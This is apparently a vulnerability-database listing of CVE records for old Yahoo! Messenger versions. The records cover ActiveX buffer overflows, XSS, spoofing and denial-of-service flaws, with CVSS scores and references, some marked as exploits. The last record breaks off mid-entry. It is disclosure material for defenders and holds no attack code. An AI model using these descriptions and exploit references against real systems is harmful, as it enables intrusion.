Vulnerabilities related to yahoo - messenger
Vulnerability from fkie_nvd
Published
2006-12-15 22:28
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in the YMMAPI.YMailAttach ActiveX control (ymmapi.dll) before 2005.1.1.4 in Yahoo! Messenger allows remote attackers to execute arbitrary code via a crafted HTML document. NOTE: some details were obtained from third party information.
Impacted products



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "6DEE11C2-06D7-47AA-8A7B-0063B97E9F58",
              "versionEndIncluding": "8.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1C35A346-6510-44D2-A36E-E6661B6586F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "ADE2C978-8812-489D-94F9-186B5519545B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in the YMMAPI.YMailAttach ActiveX control (ymmapi.dll) before 2005.1.1.4 in Yahoo! Messenger allows remote attackers to execute arbitrary code via a crafted HTML document.  NOTE: some details were obtained from third party information."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer en el controlador YMMAPI.YMailAttach ActiveX (ymmapi.dll) anterior a 2005.1.1.4 en Yahoo! Messenger permote a un atacante remoto ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de un documento HTML manipulado.\r\nNOTA: algunos de estos detalles se han obtenido de informaci\u00f3n de terceros."
    }
  ],
  "id": "CVE-2006-6603",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.3,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 10.0,
        "obtainAllPrivilege": true,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2006-12-15T22:28:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://messenger.yahoo.com/security_update.php?id=120806"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/23401"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1017387"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/901852"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/21607"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/5016"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://messenger.yahoo.com/security_update.php?id=120806"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/23401"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1017387"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/901852"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/21607"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/5016"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2005-02-18 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
The Audio Setup Wizard (asw.dll) in Yahoo! Messenger 6.0.0.1750, and possibly other versions, allows attackers to execute arbitrary code by placing a malicious ping.exe program into the Messenger program directory, which is installed with weak default permissions.
Impacted products
Vendor Product Version
yahoo messenger 5.5
yahoo messenger 5.6
yahoo messenger 5.6.0.1351
yahoo messenger 6.0
yahoo messenger 6.0.0.1750



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
              "matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1750:*:*:*:*:*:*:*",
              "matchCriteriaId": "0595ECE8-C876-441F-B90A-FC8D80BA1034",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The Audio Setup Wizard (asw.dll) in Yahoo! Messenger 6.0.0.1750, and possibly other versions, allows attackers to arbitrary code by placing a malicious ping.exe program into the Messenger program directory, which is installed with weak default permissions."
    }
  ],
  "id": "CVE-2005-0242",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "LOCAL",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.6,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2005-02-18T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://messenger.yahoo.com/security/update6.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://secunia.com/advisories/11815"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2004-6/advisory/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://messenger.yahoo.com/security/update6.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://secunia.com/advisories/11815"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2004-6/advisory/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2002-06-25 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger 5.0 allows remote attackers to spoof other users by modifying the username and using the spoofed username for social engineering or denial of service (flooding) attacks.
Impacted products
Vendor Product Version
yahoo messenger 5.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Yahoo! Messenger 5.0 allows remote attackers to spoof other users by modifying the username and using the spoofed username for social engineering or denial of service (flooding) attacks."
    }
  ],
  "id": "CVE-2002-0321",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2002-06-25T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.iss.net/security_center/static/8267.php"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/952875"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/4164"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.cert.org/advisories/CA-2002-16.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.iss.net/security_center/static/8267.php"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/952875"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.securityfocus.com/bid/4164"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-02-06 02:28
Modified
2025-04-09 00:30
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information.
Impacted products
Vendor Product Version
yahoo messenger *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B9F5887C-8E39-47B5-9777-8FADE8A7C893",
              "versionEndIncluding": "8.1.0.209",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields.  NOTE: some of these details are obtained from third party information."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de secuencias de comandos en sitios cruzados (XSS) en la funcionalidad Detalles de Contacto en Yahoo! Messenger 8.1.0.209 y anteriores permite a atacantes remotos con la intervenci\u00f3n del usuario inyectar secuencias de comandos web o HTML de su elecci\u00f3n a trav\u00e9s de un URI javascript: en el atributo SRC de un elemento IMG en los campos (1) Nombre (First Name), (2) Apellido (Last Name), y (3) Apodo (Nickname). NOTA: algunos de estos detalles se han obtenido de informaci\u00f3n de terceros."
    }
  ],
  "evaluatorImpact": "Access Complexity: Successful exploitation requires that the attacker is in the messenger list of the target.",
  "id": "CVE-2007-0768",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2007-02-06T02:28:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/31674"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/23928"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/22269"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/31674"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/23928"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/22269"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-02-09 19:28
Modified
2025-04-09 00:30
Severity ?
Summary
Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Impacted products
Vendor Product Version
yahoo messenger 4.0
yahoo messenger 5.0
yahoo messenger 5.0.1046
yahoo messenger 5.0.1065
yahoo messenger 5.0.1232
yahoo messenger 5.5
yahoo messenger 5.5.1249
yahoo messenger 5.6
yahoo messenger 5.6.0.1347
yahoo messenger 5.6.0.1351
yahoo messenger 5.6.0.1355
yahoo messenger 5.6.0.1356
yahoo messenger 5.6.0.1358
yahoo messenger 6.0
yahoo messenger 6.0.0.1643
yahoo messenger 6.0.0.1750
yahoo messenger 6.0.0.1921
yahoo messenger 7.0.438
yahoo messenger 7.5.0.814
yahoo messenger 8.0
yahoo messenger 8.0.0.863
yahoo messenger 8.0_2005.1.1.4
yahoo messenger 8.1.0.209
yahoo messenger 8.1.0.239



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A5FAAEB-793F-405B-A8D9-872FCEEBFB55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0.1046:*:*:*:*:*:*:*",
              "matchCriteriaId": "E28F9A8C-206B-49D3-9F25-D25F4CD74DF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0.1065:*:*:*:*:*:*:*",
              "matchCriteriaId": "077D9394-E0DB-4BE1-9666-ED98A459D57C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.0.1232:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB29459E-C84F-46BC-9679-A55D285287E1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5.1249:*:*:*:*:*:*:*",
              "matchCriteriaId": "3EC324E2-C08F-4090-82CD-5A64165986F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1347:*:*:*:*:*:*:*",
              "matchCriteriaId": "CEAC4C7A-4A77-41ED-BC6D-6F962283107E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
              "matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1355:*:*:*:*:*:*:*",
              "matchCriteriaId": "E025BBCF-8E26-4E83-BA49-9A10E3011428",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1356:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC0DD432-79BA-4750-B53C-A5149DACBE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1358:*:*:*:*:*:*:*",
              "matchCriteriaId": "47ABA651-3F7A-4647-AA21-14B552694A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1643:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9479AAB-AFFD-4976-96AC-B97DE517BFC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1750:*:*:*:*:*:*:*",
              "matchCriteriaId": "0595ECE8-C876-441F-B90A-FC8D80BA1034",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1921:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3FFB3BF-1092-46E4-9C0D-FF91E0FB1371",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.0.438:*:*:*:*:*:*:*",
              "matchCriteriaId": "451603CE-2DAF-47AF-A1E6-F79A514E1E51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:7.5.0.814:*:*:*:*:*:*:*",
              "matchCriteriaId": "45452EA7-2FE3-496C-A523-6B5CDDB0C540",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.863:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D369102-AC28-45D1-A9E7-B6C4F34529C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0_2005.1.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B4212E3-8338-430F-A9BC-A28D502B8B81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.209:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A9243F4-ADE8-4B7A-A195-EEAD41FF14EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.239:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CAF169E-8466-43EF-A03D-D49256EB2C18",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad no especificada en la funcionalidad Chat Room en Yahoo! Messenger 8.1.0.239 y anteriores permite a atacantes remotos provocar denegaci\u00f3n de servicio a trav\u00e9s de vectores no especificado. NOTA: la procedencia de esta informaci\u00f3n es desconocida; los detalles han sido obtenidos a partir de la informaci\u00f3n de terceros. \r\n"
    }
  ],
  "id": "CVE-2007-0868",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-02-09T19:28:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/34696"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/22407"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/34696"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/22407"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-06-11 18:30
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
References
cve@mitre.org | http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html | Exploit
cve@mitre.org | http://messenger.yahoo.com/security_update.php?id=060707 | Patch
cve@mitre.org | http://research.eeye.com/html/advisories/published/AD20070608.html | Vendor Advisory
cve@mitre.org | http://research.eeye.com/html/advisories/upcoming/20070605.html | Vendor Advisory
cve@mitre.org | http://secunia.com/advisories/25547 | Patch, Vendor Advisory
cve@mitre.org | http://securityreason.com/securityalert/2809
cve@mitre.org | http://securitytracker.com/id?1018204
cve@mitre.org | http://www.kb.cert.org/vuls/id/949817 | US Government Resource
cve@mitre.org | http://www.securityfocus.com/archive/1/470861/100/0/threaded
cve@mitre.org | http://www.securityfocus.com/bid/24341
cve@mitre.org | http://www.securityfocus.com/bid/24354 | Exploit
cve@mitre.org | http://www.securitytracker.com/id?1018203
cve@mitre.org | http://www.vupen.com/english/advisories/2007/2094
cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/34758
cve@mitre.org | https://www.exploit-db.com/exploits/4042
af854a3a-2127-422b-91ae-364da2661108 | http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html | Exploit
af854a3a-2127-422b-91ae-364da2661108 | http://messenger.yahoo.com/security_update.php?id=060707 | Patch
af854a3a-2127-422b-91ae-364da2661108 | http://research.eeye.com/html/advisories/published/AD20070608.html | Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | http://research.eeye.com/html/advisories/upcoming/20070605.html | Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | http://secunia.com/advisories/25547 | Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | http://securityreason.com/securityalert/2809
af854a3a-2127-422b-91ae-364da2661108 | http://securitytracker.com/id?1018204
af854a3a-2127-422b-91ae-364da2661108 | http://www.kb.cert.org/vuls/id/949817 | US Government Resource
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/archive/1/470861/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/24341
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/24354 | Exploit
af854a3a-2127-422b-91ae-364da2661108 | http://www.securitytracker.com/id?1018203
af854a3a-2127-422b-91ae-364da2661108 | http://www.vupen.com/english/advisories/2007/2094
af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/34758
af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/4042
Impacted products
Vendor Product Version
yahoo messenger 2.0.1.4 (this value matches the ywcupl.dll version given in the summary, not a Messenger release number)
yahoo messenger 8.0
yahoo messenger 8.0.0.863
yahoo messenger 8.0.1
yahoo messenger 8.0_2005.1.1.4
yahoo messenger 8.1.0.249



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:2.0.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "6944C050-C328-45DB-B2C3-0CA43C0D790C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.863:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D369102-AC28-45D1-A9E7-B6C4F34529C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "012BF14B-1009-4BDE-A699-C5989F576199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.0_2005.1.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B4212E3-8338-430F-A9BC-A28D502B8B81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.249:*:*:*:*:*:*:*",
              "matchCriteriaId": "15660D84-B392-457E-B433-9B9180A49B3E",
